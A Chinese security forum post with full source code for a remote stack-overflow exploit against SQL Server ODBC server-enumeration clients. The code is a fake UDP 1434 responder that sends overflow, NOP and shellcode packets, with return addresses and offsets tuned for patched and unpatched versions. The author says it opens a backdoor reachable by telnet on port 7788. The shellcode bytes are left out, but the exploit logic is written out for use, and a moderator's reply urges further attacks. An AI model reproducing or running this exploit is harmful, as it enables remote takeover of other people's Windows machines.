论坛: 编程破解 标题: SQL SERVER ODBC列举服务器堆栈溢出攻击的实现。 复制本贴地址    
作者: flashsky [flashsky]    论坛用户   登录
关于ODBC溢出终于找到了解决之道。
由于原来一心只想把UNICODE代码拷贝过来,由于诸多原因,会导致大量覆盖地址,结果造成一些系统数据的被覆盖,而无法达到执行代码目的,后来我想,是否可以只仅仅覆盖到返回地址,由返回地址执向我们其他的可以控制的地址呢。
仔细考察一下情况,我们数据存在的地址主要有:
1。RECVFROM接收的数据
2。分配的堆
3。拷贝的堆栈
由于堆栈只覆盖到返回地址,我们就要再1和2上面动脑筋了,但1在拷贝到堆之后会清除掉,所以我们能利用的就只能是2了。
考察一下,发现其堆的分配,第一次一般在0x11cb00左右,那么考虑多种情况和unicode可转换的情况,我们可以设置成0x1240fe这个地址作为返回地址,只要保证堆在如下情况
[正常的我们或别人的应答包][我们覆盖地址的包][空操作包][SHELLCODE]
                                              0x1240fe在空操作包之间
于是在堆栈溢出后,地址就指向了堆的这个位置。
就可以达到目的,选择0x1240fe主要是考虑可能其他有很多或SQL SERVER不存在情况,可以调整。
但是在覆盖地址以后,由于程序连续处理后面的包,会把我们的地址又覆盖掉,因为后面空操作和shellcode结合在一起肯定是要大于溢出点的,所以覆盖地址的包后面还要加0,这样就让程序处理到[我们覆盖地址的包]就能返回回来了。
于是实验,成功。但是发现其他机器不行,一检查发现我的是打了SP3的,而其他的没打,反汇编一下其程序,大致一样,只是其溢出点不同,现在的是6000,而以前的是1036是覆盖地址,修改了一下溢出点地址,OK,全部成功。下面这个就是对老新版本都兼容的一个溢出攻击演示程序,一直等待有人发出ODBC列举请求就进行溢出攻击,在我们公司网络上所有的WINDOWS的机器基本都能溢出成功,但由于该shellcode只在ODBC进程内,关闭了这个进程产生的后门就被关闭了,溢出后不关闭这个进程然后telnet host 7788就可以登陆上去,当然也可以写成进程之外处理的,另外UNICODE编码和UNICODE SHELLCODE略去,需要的话象ISNO请教。另外堆的地址第二次操作时会变化,第一次基本都是固定的,但一般用SQL SERVER ODBC列举服务器的客户端基本都属第一次,所以问题不是很大。

再可以先在网络测试一下本地SQL SERVER的个数,调整一下溢出返回地址(要用unicode编码)和发送空包的个数,使得能达到地方,不过基本都能搞定。

#define  DATABASE      0x61
#include <winsock2.h>
#include <windows.h>

void main()
{
    unsigned char buffer[7000];
    unsigned char bufhead[3]={5,0xfc,0xf};
    unsigned char buf1 []="ServerName;11111111;InstanceName;MSSQLSERVER;IsClustered;No;Version;8.00.194;tcp;1433;np;\\\\11111111\\pipe\\sql\\query;;";
    unsigned char buf2 [4092];
    unsigned char buf3 [1024];
    unsigned char sendbuf [0x2000];
    unsigned  char temp;
    unsigned  char widecode[9000];
    WSADATA WSAData;
    SOCKET sock;
    SOCKADDR_IN addr_in;
    HANDLE listener;
    int e;
    int i;
    int sendlen;
    DWORD a1;
    const int SNDBUF = 0;
    const int TCPNODELAY = TRUE;
    const int BROADCAST = TRUE;
    struct sockaddr_in udpfrom;
    int udpfromlen = sizeof(udpfrom);
    int n ;
    unsigned char shellend[4] = {0x4e,0x4e,0,0};

    unsigned char myshellcode[]=;unicode shellcode
    unsigned char shellcodehead[70]=;unicode解码头
    shellcodehead[66]=0;
    shellcodehead[67]=0;
    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    {
        printf("WSAStartup error.Error:%d\n",WSAGetLastError());
        return FALSE;
    }

    if ((sock=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP))==INVALID_SOCKET)
    {
        printf("Socket failed.Error:%d\n",WSAGetLastError());
        return FALSE;
    }
    
    sendlen = WideCharToMultiByte(0x3a8,WC_COMPOSITECHECK,shellcodehead,-1,sendbuf,0x1000,NULL,NULL);
    sendlen--;
    memcpy(sendbuf+sendlen,myshellcode,sizeof(myshellcode)-1);
    sendlen=sendlen+sizeof(myshellcode)-1;
    i = WideCharToMultiByte(0x3a8,WC_COMPOSITECHECK,shellend,-1,sendbuf+sendlen,0x10,NULL,NULL);
    sendlen = sendlen +i-1;    
    memset(buf2,0x4,4092);
    memset(buf3,0x4,1024);
    
    buf2[3001]=0x81; //本来应该是3000,但是由于照顾老版本加入的,使得多一位
    buf2[3002]=0xaa;
    buf2[3003]=0x12;//新版本的溢出点*/
    buf2[3004]=0;   //必须要加入,使得程序判断为0导致不在处理后面的shellcode就直接返回而不破坏我们为此做的溢出覆盖
    buf2[512]=0x2;  //防止老版本取用这个地址导致异常
    buf2[513]=0x3;
    buf2[518]=0x81;
    buf2[519]=0xaa;
    buf2[520]=0x12;//为照顾老版本的溢出点;*/

    //构造一个地址溢出包  //NOP+溢出地址

    addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(1434);      
    addr_in.sin_addr.S_un.S_addr=inet_addr("192.168.0.60");
    n = bind(sock,(SOCKADDR*)&addr_in,sizeof(addr_in));
    if(n!=0)
    {
         e= WSAGetLastError();
         return -1;
    }
    for(;;)
    {
        n = recvfrom(sock, buffer, sizeof(buffer), 0, (struct sockaddr *)&udpfrom, &udpfromlen);    
        *((WORD *)(bufhead+1))=sizeof(buf1)-1;
        memcpy(buffer,bufhead,3);
        memcpy(buffer+3,buf1,sizeof(buf1)-1);//进行时间延长,避免包被其他的打断    
        for(i=0;i<10;i++)
        {
            n = sendto(sock, buffer,sizeof(buf1)+2, 0,(struct sockaddr *)&udpfrom, &udpfromlen);
            Sleep(20);
        }
        
        Sleep(50);

        *((WORD *)(bufhead+1))=3005;
        memcpy(buffer,bufhead,3);
        memcpy(buffer+3,buf2,3005);//发送地址覆盖包
        n = sendto(sock, buffer,3008, 0,(struct sockaddr *)&udpfrom, &udpfromlen);        

        //写入空操作串
        *((WORD *)(bufhead+1))=1024;
        memcpy(buffer,bufhead,3);
        memcpy(buffer+3,buf3,1024);
        for(i=0;i<10;i++)
            n = sendto(sock, buffer,1027, 0,(struct sockaddr *)&udpfrom, &udpfromlen);        

        //写入SHELLCODE
        *((WORD *)(bufhead+1))=4092;
        memcpy(buffer,bufhead,3);
        memcpy(buffer+3,sendbuf,4092);
        n = sendto(sock, buffer,4095, 0,(struct sockaddr *)&udpfrom, &udpfromlen);        
    }
    WSACleanup();
    return 0;


地主 发表时间: 09/28 14:41
回复: syshunter [syshunter]   版主   登录
再接再厉,把MS-SQL开到底,呵呵

B1层 发表时间: 09/29 08:45

论坛: 编程破解

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号